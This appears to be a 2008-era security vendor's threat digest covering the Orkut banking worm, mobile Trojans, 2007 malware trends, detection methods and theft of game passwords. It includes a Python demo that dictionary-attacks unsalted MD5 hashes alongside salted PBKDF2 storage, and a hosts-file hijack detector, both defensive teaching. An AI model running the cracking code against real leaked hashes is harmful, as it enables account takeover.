Orkut is extremely popular in a number of countries through the world, and particularly in Brazil and India. According to data provided by Alexa.com, a web information company, 67% of the requests made to Orkut come from Brazil, and more than 15% from India.
For the last few years, Brazil has been seen as one of the most virus-ridden countries in the world. Brazilian virus writers are notorious for the thousands of different Trojans they've created to steal bank account data. Families such as Bancon, Banpaes and Banload consist almost entirely of Trojans created in South America.
Online banking is very popular in Brazil. Orkut is very popular in Brazil. There are lots of virus writers in Brazil. These three factors combine to result in one thing: the appearance of a worm which spreads via Orkut and steals account data to online banking systems.
Out of all the social networking sites, Orkut has the longest list of malicious programs which target it. In 2006 and 2007 the site suffered from virus epidemics, and between 2005 and 2007, Orkut was the target of hacker attacks, and many vulnerabilities were detected. The most recent publicized incident was the appearance of a script worm in December 2007, when over 700,000 users ended up infected.
A mere two months later, in February 2008, a new epidemic broke out. This time the hackers hadn't bothered to search for or exploit XSS vulnerabilities on Orkut. The new worm functioned in accordance with relatively simple principles:
1. The user gets a message from one of his/her contacts. The message contains a pornographic picture in Flash movie format.
2. If the user clicks on the image, s/he is redirected to a malicious site.
3. The user is asked whether s/he wants to install a Flash player application, which is in fact a Trojan program.
4. Once the Trojan has been downloaded and launched, it downloads other Trojan components to the victim machine via the Internet.
5. The user's account is then used to create new messages as described in point 1.
6. A malicious module tracks the user's use of Orkut.
7. Other modules harvest data entered via the keyboard when the user contacts Brazilian online banking systems.
It's impossible to establish the exact number of victims, but our colleagues from Symantec estimate a minimum of 13,000 affected users.
This incident shows once again how vulnerable users of social networking sites can be. The main factors which make Web 2.0 services popular with users and hackers alike are listed below:
The migration of user data from the PC to the Internet
The ability to use one account to access a number of different services
Detailed information about the user
Information about the user's contacts and friends
Space to publish whatever you like
Trust between contacts
The problem has already become fairly serious, and stands every chance of becoming a major information security issue. We'll be releasing a paper dedicated to this topic in the near future.
Mobile News
The world of mobile virology was an eventful place in the first quarter of 2008. It was clear that technologies were continuing to evolve and that more and more participants, both virus writers and antivirus companies, were getting involved. Innovations in malicious code were split more or less evenly between four targets: Symbian, Windows Mobile, J2ME and the iPhone.
Symbian
As far as Symbian goes, this operating system came under attack from a worm belonging to a completely new family. Up until this point, we'd seen two types of threat: Cabir, which spreads via Bluetooth, and ComWar, which spreads via MMS. Of course, there were several variants of both these worms.
At the end of December, a program was added to our antivirus databases which at first glance seemed to simply be a new ComWar clone: ComWar.y. However, in January the appearance of this program in the traffic of one of the largest mobile operators forced us to take a more detailed look at the new sample.
An analysis conducted by one of our partners, the Finnish company F-Secure, showed that in actual fact this malicious program was representative of a completely new family, which had nothing in common with ComWar, created three years ago in Russia.
The worm, which was classified as Worm.SymbOS.Beselo.a (Beselo.b was detected shortly afterwards) functions in a way very similar to ComWar, and takes an approach typical for worms of this type. It spreads by sending infected SIS files via MMS and Bluetooth. Once the worm is launched on the device under attack, the worm starts to send itself to the contacts on the phone, and also to all accessible Bluetooth devices within range.
What's the news value in this? It's the fact that there is a new, active family of worms for mobile devices (which implies the existence of active virus writers) and the presence of this worm in the wild. New variants of Beselo could cause serious local epidemics – this after all is what happened in spring last year, when 115,000 smartphone users fell victim to a Spanish modification of the ComWar worm.
Windows Mobile
The appearance of a new malicious program for Windows Mobile, which hasn't been a focus of attention for virus writers up until now, is certainly noteworthy. However, InfoJack, a Trojan which was detected at the end of February, is particularly interesting for the following reasons:
InfoJack.a
attacks Windows Mobile
was detected in the wild
is spreading in China
steals data
This is the first malicious code targeting Windows Mobile which has been found in the wild and which has caused a significant number of infections. The code spread from a Chinese site which offered a range of legitimate software. The Trojan was added to distribution packages of mobile software such as Google Maps and game clients. The owner of the site which the Trojan spread from stated that he did not have any illegal intentions, but was collecting information about the users of the site in order to improve the service and to analyze the market for mobile applications.
Once it is on the system, the Trojan attempts to disable the protection mechanism which prevents the installation of applications which do not include a developer's digital signature. When the infected smartphone is connected to the Internet, InfoJack starts to send confidential information from the device to the Trojan's site. This information includes the device serial number, information about the operating system and installed applications. At the same time, the Trojan may download additional files to the phone without the knowledge of the user, and launch these files – it's able to do this because protection against launching unsigned applications has been disabled.
After a few days the activity of the site was halted, probably in connection with the investigation conducted by the Chinese police.
This report has already covered what happens when virus writers turn their attention to popular services (e.g. the attacks on Orkut in Brazil). China is undoubtedly the world leader in terms of production of malicious code; at the moment, more than 50% of all new malicious programs in our antivirus databases originate in China. Until now, Chinese hackers have targeted online gamers who use personal computers. However, the case of InfoJack shows that there is the capability to organize mass epidemics and create mobile viruses.
China has become the first country to suffer from a Windows Mobile Trojan. It's possible that the author of InfoJack really didn't have anything illegal in mind. However, now the foundation has been laid, the thousands of Chinese hackers currently creating viruses for personal computers may choose to build on it.
J2ME
During the first quarter of 2008, Trojans for J2ME (which will run on almost any modern mobile phone, not just on smartphones) started appearing with frightening regularity. In January we detected Smarm.b, followed by Smarm.c and Swapi.a, and March brought SMSFree.d.
All these Trojans were detected in Russia, and they all use the same method for making money out of users: sending SMS messages to premium numbers. (An investigation into a similar SMS sending Trojan, Viver, which we conducted last year, showed that in three days the author of the Trojan could earn approximately $500). In spite of all these incidents, Russian mobile content providers continue to maintain the anonymity of those who register premium numbers. This effectively makes virus writers immune to prosecution: the appearance of new variants of malicious programs and a lack of information about any arrests clearly demonstrates this.
Apart from the J2ME Trojans mentioned above, there are another two malicious programs which send SMS messages to premium numbers. Flocker.d and Flocker.e, both written in Python and designed to attack smartphones, were detected in January 2008.
These malicious programs use the same propagation method as InfoJack: they spread via popular sites which offer software for mobile phones. The Trojans are either disguised as legitimate utilities, or are integrated into such products.
iPhone
We'll conclude this section on mobile threats with information about a long awaited event: the release in March of the iPhone SDK.
We had believed that the release of the SDK would lead to the appearance of a multitude of malicious programs for iPhone. However, what the open Apple SDK provides is actually very limited.
Apple has followed Symbian's lead: the model for creating and distributing programs for the iPhone is based on the idea of 'signed' applications. The main restrictions are laid out in the iPhone SDK agreement: "No interpreted code may be downloaded and used in an application except for code that is interpreted and run by Apple's published APIs and built in interpreter(s). An application may not itself install or launch other executable code by any means, including without limitation through the use of a plug-in architecture, calling other frameworks, other APIs or otherwise."
These restrictions do not only make life more difficult for virus writers; they also effectively rule out such applications as Firefox, Opera, many games, IM clients and much other useful software: applications which could be extremely popular among iPhone users and which could extend the device's capabilities.
In the four days after the SDK was released, it was downloaded more than 100,000 times. It seemed that such a huge number of potential developers should lead to an increase in new applications created using the SDK. However, this is not happening.
Apple has, in a formal sense, fulfilled its promise by making the SDK available. However, it's not yet clear how this step will influence the development even of legitimate software for the phone. The restrictions are too stringent, and too many functions in the SDK remain closed.
The second major restriction is that applications which have been created using the SDK can only be distributed via Apple's own online store. This creates a large number of additional barriers, ranging from the number of 'vendors' (developers) allowed, to geographical restrictions (only those in the USA are allowed to participate).
It's clear that under these conditions it will be impossible to launch an antivirus product for the iPhone: not for technical reasons, but because of the licensing and distribution restrictions described above.
The continued hacking of the iPhone acts as the backdrop here. It's estimated that between 45% - 50% of all devices sold have been 'unlocked'. All of these devices are potentially vulnerable to infection by any malicious program for iPhone, as the user will be downloading files from many different unofficial sources to his/ her device. This can't be controlled in any way: users of modified phones are not entitled to official technical support, and we'll be unable to provide them with any antivirus protection.
It's likely that in the foreseeable future the number of people using such devices will equal the number of Symbian smartphone users in 2004 – the year that Cabir appeared.
Conclusion
The events of the first three months of 2008 show that the period of technical stagnation in the threat landscape is drawing to a close.
Last year, we described conveyor belt code: a process generating multiple primitive copy-cat programs which do not implement any new virus technologies. The phenomenon can be explained: virus writers chose to use tried and tested methods because at the time even old, well-known approaches were capable of bringing in profits if applied on an industrial scale.
However, there is now a noticeable change in direction, shown above all by the appearance of the first malicious implementation of a bootkit. In addition, file infection methods are being used more and more frequently, often in conjunction with complex polymorphic techniques. It should also be noted that virus writers are borrowing certain technologies from the antivirus world. For instance, we've already detected malicious programs which, in order to delete antivirus solutions or block their installation, carry signatures for the antivirus vendor's own files; previously, virus writers confined themselves to having their creations search for such files by name.
Today, old technologies are being re-examined, rethought, and implemented at new levels. The struggle of virus versus antivirus is moving from software towards the hardware level.
Although the events of the first quarter of 2008 cannot yet be seen as creating a definite trend, the issues raised may have a strong influence on the entire information security business in the near future.
Virus History
Boot sector and DOS file viruses were the first PC viruses, and by the end of the 1980s, these threats had been joined by a few worms and the first Trojans. Virus writers used a range of stealth techniques to extend the life cycle of malicious code by evading antivirus scanners. Some of these techniques, such as suppressing error messages, and polymorphism (which ensures the virus code is different each time it infects a machine) are still used by virus writers today.
Antivirus solutions were initially designed as individual utilities to detect and remove specific viruses. However, as the number of viruses increased, antivirus 'toolkits' were released. These included an on-demand scanner which would search for the viruses currently in existence, and in some cases a cleaning utility. By the end of 1990, an increase in the number of viruses to nearly 300 caused antivirus vendors to implement real-time protection, and to supplement signature based analysis with heuristics, behavioural analysis, emulation and other techniques.
The appearance of the first macro virus in 1995 was a major shift, and these viruses came to dominate the threat landscape in the following four years. Such viruses were the first to deliberately infect data files; they are also neither platform-specific nor OS-specific. This move shifted the focus of the virus writing community from executable code to data. Virus macros were easy to modify, and this opened virus writing to a wider group, causing the number of viruses to increase from around 6,000 in June 1995 to more than 25,000 in December 1998.
With both the threat landscape and business practices evolving, antivirus solutions also needed to change. It became clear that gateway and mail server solutions would be required in addition to file server and workstation solutions in order to fully secure networks.
The appearance of the Melissa virus, in March 1999, was another leap forward for malicious code. Melissa's ability to spread independently ushered in the era of email worms, which spread in a variety of ways, and typically use social engineering to trick the user into running the malicious code. Internet worms, which often spread by exploiting vulnerabilities (and often combine this approach with other techniques for maximum effectiveness) made a return in 2001, and remained prevalent in the following years.
In response to these new threats, antivirus vendors started to offer solutions which were broader in scope: adding personal firewall capability, host- and network-based intrusion protection systems, application activity monitoring, and, in some cases, roll-back capability which will undo changes that malicious programs have made to a victim machine.
The decline in global epidemics since 2003 reflects a shift in the motivation of virus writers: from writing and spreading malicious code in order simply to cause damage to doing this in order to earn money illegally. This has resulted in tailor-made Trojans designed to target a specific system and malicious programs designed to steal user data such as account details and passwords to bank accounts and online games. Trojans can be used to create botnets of infected machines which are then used to send spam which may also contain malicious code. Phishing attacks have also become widespread, with cybercriminals tricking users into entering their bank account details on fake sites.
Against this background, virus writers have also started targeting the mobile devices which are increasingly used in the business world. Since the first worm for smartphones was detected in 2004, viruses, worms and Trojans for mobile devices have also put in an appearance. In the space of a few years, threats for mobile devices have evolved as much as PC malware did over the course of 20 years.
The author concludes by emphasising that the threat landscape has changed beyond recognition, making it more important than ever for users to have effective protection. Security solutions must deliver timely protection against the approximately 200 new threats which appear daily, while also implementing technologies which can block unknown threats as they appear.
Non-profit malware
2007 will be remembered as the year of the demise of “non-profit” malicious programs. For the first time, the year saw no large epidemics or major malicious programs that didn’t have a “financial” background. Almost all the outbreaks in 2007 were short-lived and affected individual regions and countries rather than the entire global Internet. This approach to organizing epidemics has already become a de facto standard in the malware world.
Among the year’s new malicious programs, a special place is occupied by the Storm Worm (Zhelatin in the Kaspersky Lab classification), which first appeared in January 2007. It demonstrated such a variety of behavior types and spreading methods during the year that each new creation from the unknown virus writers gave antivirus experts yet another headache.
Worms in the Zhelatin family incorporate implementations of nearly all the virus writing achievements of the past several years, including rootkit technologies, code obfuscation, botnets that protect themselves against analysis, and communication between infected computers via P2P networks, without a control center. Zhelatin worms make use of all the existing spreading methods, both traditional (email and instant messaging systems) and new, such as Web 2.0 services (spreading via social networks, including blogs, forums and RSS feeds).
DoS attacks were among the key information security threats throughout 2007. Following their extensive use in 2002-2003, DoS attacks lost popularity among cybercriminals. In 2007, they made a comeback, this time as a political and competitive tool rather than a method of extorting money from victims. An attack on Estonia which took place in May 2007 was extensively covered by mass media and is regarded as the first instance of cyber-warfare by many experts. Many DoS attacks of 2007 were instigated by the victims’ business competitors. Whereas four years ago, DoS attacks were used by hackers to extort money or by cybervandals to wreak havoc, such attacks are now a commodity to the same extent as spam mailings and custom-developed malicious programs.
In 2007, the cybercriminal business came up with several new types of criminal activity. One area that progressed rapidly was the development of malicious programs to order, with technical support provided to customers. A good example of a business organized along these lines is Pinch, a Trojan program whose authors developed more than 4,000 custom variants over several years. The Pinch story apparently ended in December 2007, when Nikolay Patrushev, head of Russia's Federal Security Service (FSB), announced that the Trojan's authors had been arrested.
Looking at the year’s results from the quantitative point of view, a hands-down victory was won by game Trojans, which are designed to steal data from online game users. These malicious programs significantly outnumber banking Trojans, i.e., programs that steal users’ bank account data.
Notable events of 2007 include mass site hacking attacks, after which malicious programs or links to infected sites were placed on the hacked websites. In one such event, about 10,000 Italian sites were hacked and the Mpack exploit pack was put onto the hacked sites. The Italian incident and Mpack drew attention to one more area of cybercriminal activity: the malicious programs were traced to Russian Business Network (RBN) websites. In fact, this is an example of so-called bulletproof hosting. The service guarantees customers anonymity, protection from legal action and the absence of log files. There was a boom of mass media coverage of RBN, which ended when RBN broke up into several hosting services in different countries, making the scale of their activities less obvious.
These were the principal events of 2007, a year that turned out to be the most “viral” year in history. The total number of IT threats more than doubled during the year. In 2007, Kaspersky Lab added almost as many signatures to its databases as it had during the preceding 15 years. Internet users had never been exposed to such a deluge of threats before, and we had to make every conceivable (and, sometimes, inconceivable) effort to get the better of these threats. This raises serious concerns, because, unless the situation radically changes in 2008 (which is highly unlikely), the number of threats will double again by the end of the year.
Forecasts
1. Malware 2.0
The evolution of malware from individual malicious programs towards sophisticated integrated projects began four years ago with a modular component system used in the Bagle worm. The new malicious program operating model, the effectiveness of which was demonstrated in 2007 by the Storm Worm, will not only become a standard on which a host of new malicious projects will be based, but will also be further developed and perfected.
The model has the following main features:
A network of infected computers is not centrally controlled.
The malware actively resists third-party attempts to analyze its malicious activity and take control of it.
Malicious code is distributed to a large number of computers, but this distribution is performed over a limited period of time.
Social engineering methods are skillfully used.
Different methods are used for malware distribution, with the most obvious methods (such as email) gradually losing popularity.
Different functions are performed by different modules (instead of the all-in-one design).
The new generation of malicious programs can be regarded as Malware 2.0. These techniques are used by such malicious programs as Bagle, Zhelatin and Warezov, which are mostly spam-oriented. At the same time, several banking and game Trojan families are also showing signs of evolving towards the Malware 2.0 paradigm.
2. Rootkits and “bootkits”
Technologies that mask the presence of malicious programs in the system (rootkits) will be used not only by Trojans, but by file viruses as well. One dangerous method of masking the presence of malware in the system is based on infecting the hard drive’s boot sector (programs that do this are called bootkits). This is a reincarnation of an old technique, which allows a malicious program to take control before the operating system (and antivirus software) fully boots. In 2007, this method was used by Backdoor.Win32.Sinowal. This is a significant threat, which could become one of the most dangerous information security threats of 2008.
3. File viruses
File viruses will continue their comeback. As before, they will be developed primarily by Chinese cybercriminals and will target users of online games. The authors of Zhelatin or Warezov might well use file infection as well, since this can provide them with one more efficient distribution method.
In 2008, we can expect a surge in the number of incidents involving infected game and program distribution packages available from popular websites or via P2P networks. Viruses will target those files which users provide to other users, since in many cases this method of spreading is even more effective than sending infected files by email.
4. Attacks targeting social networks
In 2008, phishing will increasingly target users of social networks. User account data for such services as Facebook, MySpace, LiveJournal, Blogger etc. will be in demand among cybercriminals. This will become an important alternative to distribution methods based on putting malicious programs onto hacked websites. In 2008, many Trojans will be distributed through the accounts of social network users, via their weblogs and profiles.
XSS / PHP / SQL attacks will be one more problem associated with social networks. Unlike phishing, which is based on fraud and social engineering methods only, these attacks take advantage of errors and vulnerabilities in Web 2.0 services. Consequently, even the most experienced users can be affected. These attacks, like all the others, will target users’ private data and will be used to create databases and/or lists to conduct further attacks involving “traditional” methods.
5. Mobile threats
As regards mobile devices and, specifically, mobile phones, threats will include primitive Trojans such as the Skuller family for Symbian and the “first Trojan” for the iPhone, as well as various vulnerabilities in smartphone operating systems and applications. A global epidemic of a mobile worm is still unlikely, though, from a technical point of view, it is possible. In 2007, the consolidation of the mobile operating system market between Symbian and Windows Mobile was disrupted somewhat by the launch of the iPhone and the announcement by Google of Android, its new mobile platform. As a result of the iPhone’s popularity and newcomer status, it is likely to attract more attention from cybercriminals than other mobile devices, especially if Apple makes its iPhone software development tools (SDK) available to the public, as they promised in late 2007.
MalCode Evolution
Although the title seems to reference the full spectrum of technologies used to detect malicious code, the article focuses on nonsignature technologies.
At the beginning of the article the author points out that any technology used to detect malicious code has two components – a technical component and an analytical component. The technical component is the sum of all functions and algorithms which provide the analytical component with data for analysis. The analytical component is a decision making system which delivers a verdict on the data analysed.
The technical component. The technical component of a malware detection system collects data that will be used to analyze the situation.
As any malicious program is both a file with specific content and the sum of the effects the malicious program has on the operating system, there are a range of methods used to collect data in order to identify malicious code. These methods are listed in order of abstraction. The term abstraction is used to denote the point of view from which the program being run is viewed: as an original digital object (a collection of bytes), as a behaviour (more abstract than the collection of bytes) or as the sum of effects on the operating system (more abstract than the behaviour). Antivirus technology has, more or less, evolved along these lines: working with files, working with events via a file, working with a file via events, and working with the environment itself. Consequently, the list given in the article illustrates a natural chronology.
The very first antivirus programs analyzed file code which was treated as byte sequences.
Using this method means that only the source byte code of a program is analyzed; program behaviour is not taken into account. Today, this method continues to be used in antivirus software - not as the sole detection method, but as a complement to other technologies.
Emulating program code.
Emulation involves imitating the work of one system using another system without losing functionality and without distorting results. In antivirus software, the emulator breaks a program's byte code down into instructions and then executes each instruction in a virtual copy of the computer environment. In other words, although an emulator works with a file, what it actually analyzes are events. Emulation makes it possible to observe a program's behaviour without putting the operating system and user data at risk.
Virtualization: launching a program in a sandbox.
A sandbox is an environment which uses partial or total restriction or emulation of operating system resources to ensure that a program can be launched safely within it. In this case, virtualization makes it possible to work with a program that is running in a real environment, but one that is strictly controlled. Using the metaphor of a child in a playground, the operating system represents the world, the malicious program is the child, and the constraints within which the child plays are the confines of the sandbox: a set of rules for interaction between the program and the operating system. Any point of contact between the program and its environment (such as the file system and system registry) can be virtualized. Whereas emulation provides an environment in which programs can be run, virtualization uses the operating system itself as the environment, with the sandbox controlling the interaction between the environment and the program.
Monitoring system events.
Whereas an emulator or sandbox observes each program separately, monitoring technology observes all programs simultaneously by registering all operating system events created by running programs. This technology is currently the most rapidly evolving. However, it is not the most fail-safe technology, as the risk created by launching a program in a real environment significantly lowers the level of protection. Additionally, monitoring technology can be deceived by a malicious program.
Searching for system anomalies.
This method makes use of the following features:
an operating system, together with the programs running within that system, is an integrated system;
the operating system has an intrinsic “system status”;
if malicious code is run in the environment, then the system will have an “unhealthy" status; this differs from a system with a "healthy" status, in which there is no malicious code.
In order to detect malicious code effectively using this method, a relatively complex analytical system (such as an expert system or neural network) is required. Due to this complexity, the technology is still currently underdeveloped. At the moment, implementations in this area generally compare the condition of the system with a known standard, but this is not effective.
The analytical component. As for the analytical component, the sophistication of decision-making algorithms varies. Roughly speaking, they can be divided into three categories:
Simple comparison.
In this category, a verdict is issued based on the comparison of a single object with an available sample.
Complex comparison.
In this case a verdict is issued based on the comparison of one or several objects with corresponding samples. The templates used for comparison may be flexible, and the comparison gives a probability based result.
Expert systems.
In this category, a verdict is issued after a sophisticated analysis of data. An expert system may include elements of artificial intelligence.
The article then goes on to examine exactly which algorithms are used in which malware detection technologies. The technical component of a technology is responsible for features such as how resource-hungry a program is (and consequently how quickly it works), security and protection. In general, the less abstract the form of protection, the safer it is for the system being protected, but the easier it is to circumvent.
The analytical aspect of a technology is responsible for features such as proactivity (and the consequent impact on the necessity for frequent antivirus database updates), the false positive rate and the level of user involvement. This last denotes the extent to which a user needs to participate in defining protection policies: creating rules, exceptions and black and white lists. It also reflects the extent to which the user participates in the process of issuing verdicts by confirming or rejecting the suspicions of the analytical system. The more complex the analytical system, the more powerful the protection is. However, increased complexity means an increased number of false positives, which can be compensated for by greater user input.
The author concludes by offering recommendations on how to choose non-signature protection. She stresses that there is no universal or ‘best’ protection; each technology has its pluses and minuses. In choosing a product, the user should be guided by the results of independent tests, and reviews by users of established antivirus solutions.
Online gaming and Virus Arena
The article explains why online games have become so popular in recent years: they involve exploring magnificent virtual worlds and completing tasks - known as quests - which gain the players money, valuables and experience, not points as in a more traditional computer game. They can be purchased at stores or downloaded from the Internet, but in order to play there is usually a monthly subscription fee. The money from these monthly fees covers traffic costs, support for game servers and game development. New online games appear every year, and the number of players is constantly increasing.
Online games are played on both legitimate and rogue game servers, which appear in approximately equal numbers. Rogue servers are very popular among users such as students and adolescents who have very little money – why waste money on subscription fees if it's possible to play the same game for free on a rogue server? However, the author stresses that rogue servers are often set up with the aim of making money not from subscription fees, but from the sale of virtual items to players in exchange for real money. Such sales may also be conducted by the administrators of official servers, depending on the server policy.
The author poses an interesting question: if server administrators are selling in-game items, is it legitimate for the players themselves to sell such items? The answer is yes, and this is often done in defiance of administrative rules. Certain sites on the Internet contain detailed information on the price of various in-game items, although such deals are, more often than not, illegal.
Any in-game item can have a price in real money, which depends on demand. If there is a demand for certain in-game items or confidential data, they will be stolen. With the right knowledge, it is relatively easy to conduct such thefts, since most game servers use only passwords for authentication. Cyber criminal activity is often blocked by the administrators of official game servers. However, criminal or dubious activity is unlikely to be investigated by the administrators of rogue servers, and victims cannot rely on the support of those administrators.
Online gamers are constantly targeted by cyber criminals, who use several methods in order to steal confidential data:
Social engineering.
One method used by cyber criminals is to enter a game or a forum on a game server and offer a bonus, or help in the game, in exchange for other players’ passwords. Naïve players looking for ways to make their life easier will often be tempted by such offers.
Another well-known social engineering method is phishing, where the cyber criminal sends phishing emails, purportedly from the server administrators, which invite the player to authenticate his/ her account via a website linked in the message.
Although such password harvesting techniques are simple and reasonably effective, they don't result in much profit for malicious users, as more advanced, “wealthy” players don’t take the bait.
Exploiting game server vulnerabilities.
Just like any other software, game server code contains programming errors and bugs. Such vulnerabilities can be exploited by cyber criminals to gain access to server databases and harvest player passwords or password hashes. (A hash cannot be decrypted, but if the server stores unsalted hashes of weak passwords, dedicated cracking programs recover most of them by dictionary or brute-force attack.) For instance, there is a known vulnerability linked to in-game player chat which arises if the chat environment is not isolated from the game database. This makes it possible for a malicious user to harvest passwords directly from in-game chat.
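To make the point about password hashes concrete, the following example (added here; it is not code from the article or from any game server) runs a dictionary attack against a constructed table of unsalted MD5 hashes and then against the same passwords stored with a per-user salt and PBKDF2. All user names, passwords and the wordlist are made up; the comparison applies to any application that stores password hashes, not only game servers.

```python
import hashlib
import hmac
import os

# Constructed sample: an unsalted MD5 "password" column of the kind a
# carelessly written server might keep. Values are MD5 of the plaintexts listed.
LEAKED_MD5 = {
    "player1": hashlib.md5(b"dragon").hexdigest(),
    "player2": hashlib.md5(b"letmein").hexdigest(),
    "player3": hashlib.md5(b"Xk3#9qLpz!").hexdigest(),  # strong, not in the wordlist
}

# Constructed wordlist; real attack lists contain millions of entries.
WORDLIST = ["123456", "password", "dragon", "letmein", "qwerty"]


def crack_md5(hashes, wordlist):
    """Dictionary attack on unsalted hashes: hash every candidate once, then
    every leaked hash is a single dictionary lookup."""
    lookup = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: lookup[h] for user, h in hashes.items() if h in lookup}


def hash_password(password, salt=None, iterations=200_000):
    """Hardened storage: per-user random salt plus PBKDF2-HMAC-SHA256.
    The salt defeats precomputed tables; the iteration count makes every
    guess cost `iterations` HMAC rounds instead of one MD5."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt.hex() + "$" + dk.hex()


def verify_password(password, stored, iterations=200_000):
    salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), iterations)
    # constant-time compare so the check itself does not leak timing
    return hmac.compare_digest(dk.hex(), dk_hex)


def crack_pbkdf2(stored_by_user, wordlist, iterations=200_000):
    """Same wordlist against salted hashes: no shared lookup table is possible,
    so the attacker pays the full PBKDF2 cost per user per guess. Weak
    passwords still fall; only the price per guess has changed."""
    found = {}
    for user, stored in stored_by_user.items():
        for w in wordlist:
            if verify_password(w, stored, iterations):
                found[user] = w
                break
    return found


if __name__ == "__main__":
    print("unsalted MD5 cracked:", crack_md5(LEAKED_MD5, WORDLIST))
    salted = {u: hash_password(p, iterations=1000)
              for u, p in [("player1", "dragon"), ("player3", "Xk3#9qLpz!")]}
    print("salted PBKDF2 cracked:", crack_pbkdf2(salted, WORDLIST, iterations=1000))
```

The salted run uses a reduced iteration count only so the demonstration finishes quickly; the lesson is that salting and a slow hash raise the attacker's cost per guess but do nothing for a password that is in the wordlist.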
The author highlights the fact that malicious users can also exploit the mechanism designed to remind users of forgotten passwords. The article also stresses that the number and type of vulnerabilities are directly linked to server status: creating patches for rogue servers (if the administrators bother to do this at all) takes longer than patching vulnerabilities on official servers.
Exploiting game server vulnerabilities does require a certain amount of technical skill, which is why this method is not widely used.
Using malware.
This topic is covered extensively in the article. Malicious programs designed to steal passwords are spread using all means possible. Both malicious programs specifically tailored to steal any passwords and malicious programs which only target online game passwords may be used.
Programs classified by Kaspersky Lab as Trojan-PSW and Trojan-Spy (which intercept data entered via the keyboard and then transmit it to a remote malicious user) and variants of the Trojan.Win32.Qhost family (which modifies the hosts file containing the mapping of network addresses to domain names) are used to harvest passwords. Trojan-Spy.Win32.Delf has similar functionality, but configures a fake proxy server within the browser which is used when connecting to online game servers.
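The hosts-file trick used by the Qhost family is simple to check for. The following example (added here, not code from the article or from Kaspersky Lab) parses a constructed hosts file and reports any static entry that overrides a watched domain, distinguishing redirection to an attacker-controlled address from blackholing to loopback. The domain names and addresses are made up.

```python
import ipaddress

# Constructed hosts file: a normal localhost entry plus two entries of the
# kind a Qhost-style Trojan adds to redirect a game login or silence updates.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2006 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
203.0.113.10    login.example-game.com www.example-game.com   # hypothetical game login host
127.0.0.1       update.example-av.com                          # hypothetical AV update host
"""

# Hypothetical watch-list; a real check would use the domains the game client
# or security product actually resolves.
WATCHED_DOMAINS = {"login.example-game.com", "www.example-game.com",
                   "update.example-av.com"}

# Names that legitimately map to loopback.
LOCAL_ONLY = {"localhost", "localhost.localdomain", "broadcasthost"}


def parse_hosts(text):
    """Yield (ip_address, hostname) pairs, ignoring comments and blank lines."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            addr = ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # malformed line: skip rather than crash the scan
        for name in parts[1:]:
            yield addr, name.lower()


def find_hijacks(text, watched):
    """Return (hostname, ip, kind) for every watched domain pinned in the file.

    Any static mapping for a watched domain is suspicious: it either sends
    traffic to an attacker host ("redirected") or to loopback so a login or
    update never reaches the real server ("blackholed").
    """
    findings = []
    for addr, name in parse_hosts(text):
        if name in LOCAL_ONLY or name not in watched:
            continue
        kind = "blackholed" if addr.is_loopback else "redirected"
        findings.append((name, str(addr), kind))
    return findings


if __name__ == "__main__":
    for hit in find_hijacks(SAMPLE_HOSTS, WATCHED_DOMAINS):
        print("%-28s -> %-15s %s" % hit)
```

On a live Windows system the file to read is %SystemRoot%\System32\drivers\etc\hosts; the same parser works on /etc/hosts.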
Using malicious programs to harvest passwords has proved effective and simple, and consequently very popular.
The article also covers the evolution of malicious programs which harvest passwords. The first recorded use of a malicious program to steal user passwords to online games was in 1997. Cyber criminals initially used classic keyloggers. The first Trojan specifically designed to target online games was Trojan-PSW.Win32.Lmir.a, which harvests passwords to "Legend of Mir". This program was the forerunner of a generation of Trojans targeting a wide range of online games.
Trojan-PSW.Win32.OnLineGames.a was another significant development, as this Trojan targets nearly all popular online games. Each new variant includes new games to be targeted.
A modern Trojan designed to steal passwords for online games is typically a dynamic library written in Delphi that is loaded into every application launched in the system. When it detects that an online game has been launched, this kind of malicious program intercepts the password entered via the keyboard, sends the data to the malicious user's email address and then deletes itself.
In addition to using Trojans to steal passwords, worms are also widely used. Their advantage is that they are able to infect executable files and to copy themselves to removable and network disks, as well as spreading via email.
Currently, the most recent achievement by those writing viruses for online games is the polymorphic Virus.Win32.Alman.a and its successor, Virus.Win32.Hala.a. In addition to the ability to infect executable files, these programs are able to spread via network resources, mask their presence in the system, and contain a backdoor function.
The authors of malicious code also attempt to protect their programs against antivirus solutions by using packers, anti-antivirus technologies, and rootkit technologies, which mask the presence of the malicious program in the system. Recent malicious programs which target online games include all three types of self-defense mechanism.
The article also examines how attacks are conducted using a worm in order to harvest online gaming passwords. Malicious users create a worm with multiple functions: an email worm, network worm, p2p worm, rootkit, executable file infector and password stealing functionality all in one package. The worm will then be mass mailed, and an incautious user who clicks on a link in a malicious message can find himself in an unenviable position.
The author covers password theft in terms of geographical location, stating that over 90% of all Trojans targeting online games are written in China, and 90% of the passwords stolen by these Trojans belong to players on South Korean sites. Computerization and the rapid growth of IT in Russia have naturally also had an impact on the evolution of computer entertainment – online games which do not have a separate client, but which are played within the browser have become extremely popular. This popularity has led to an increase in phishing attacks in which messages containing links to cloned gaming sites are spread. The article also includes statistics demonstrating the increase in the number of malicious programs, and the extent to which individual games are targeted by cyber criminals.
The author concludes that those making a living from other people's virtual property are almost immune from a legal point of view. It is the game developers themselves who should tackle this issue, in conjunction with antivirus companies. In 2004, an agreement between Kaspersky Lab and the developers of the Russian online game Fight Club made it possible to prevent the theft of thousands of passwords and the sale of in-game items which would have been worth a five figure sum in 'real' US dollars.
The article concludes by expressing the opinion that those who are being targeted (i.e. the gamers) should take matters into their own hands by using common sense, exercising caution and installing the best security solution available.
MalwareVolution>
The events in Estonia in late April and early May will likely remain the most discussed events of 2007. Dozens of servers on the Estonian Internet were targeted by DDoS attacks after the Estonian police broke up a demonstration in Tallinn, where protestors spoke out against the Estonian government's decision to remove a monument from one of the city's central squares. (The monument commemorated Soviet soldiers who fell while liberating Estonia during WWII.) The websites of the president, the prime minister, the parliament, the police and a number of ministries were overloaded with an enormous number of requests from thousands of computers located around the world. In addition to the DDoS attacks, which were primarily targeted at government websites, dozens of other Estonian websites were defaced.
